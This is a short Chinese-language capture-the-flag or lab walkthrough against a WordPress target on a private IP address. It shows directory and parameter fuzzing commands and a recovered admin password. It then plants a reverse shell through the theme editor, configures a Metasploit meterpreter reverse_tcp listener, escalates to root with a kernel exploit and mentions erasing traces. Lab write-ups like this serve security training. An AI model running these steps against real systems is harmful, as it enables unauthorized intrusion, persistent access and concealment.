端口扫描结果
dirb http://192.168.184.131
http://192.168.184.131/dev
http://192.168.184.131/index.php
http://192.168.184.131/wordpress/index.php
dirb http://192.168.184.131 -X .txt,.php,.zip
http://192.168.184.131/image.php
http://192.168.184.131/index.php
http://192.168.184.131/secret.txt
进行模糊查询
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.184.131/index.php?FUZZ
获得wordpress后台管理密码
follow_the_ippsec
wordpress博客管理后台存在“主题编辑器注入漏洞”。
在其中发现可以用于编辑的php文件,考虑一句话木马或者反弹shell
为了能够权限维持,还是考虑建议反弹shell进行注入提权。
set payload php/meterpreter/reverse_tcp
设置反弹链接shell脚本
set lhost 192.168.184.12
设置连接到本机ip
set lport 9999
设置连接到本地端口9999
run
开始监听
成功通过执行反弹shell木马连接到目标主机
接下来就是进行提权操作啊,这里继续使用metasploit工具针对操作系统内核漏洞进行提权
得到该操作系统可能存在的漏洞信息。
成功编译对应攻击程序到桌面
然后利用meterpreter将攻击程序上传到靶机
给予提权程序权限并执行,发现此时用户为root用户,渗透成功,接下来即可进行痕迹擦除并撰写报告。